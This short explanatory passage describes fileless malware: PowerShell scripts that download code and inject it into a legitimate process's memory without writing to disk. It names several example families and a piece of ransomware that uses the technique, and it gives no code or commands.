This is an ongoing trend. This kind of malware is usually coded in PowerShell. Powershell is a scripting language used for Windows to automate tasks. A Powershell script is executed which can directly download and inject code into a legitimate process's memory. So the downloaded malware is never written as a file to the disk. Hence, we call these fileless attacks. Most Powershell malware can be categorized as downloaders.

Here is a list of fileless malware:

• Powerliks
• Kovter
• PowerSnif
• POSHSPY

SoreBrect is a piece of ransomware that uses the fileless technique.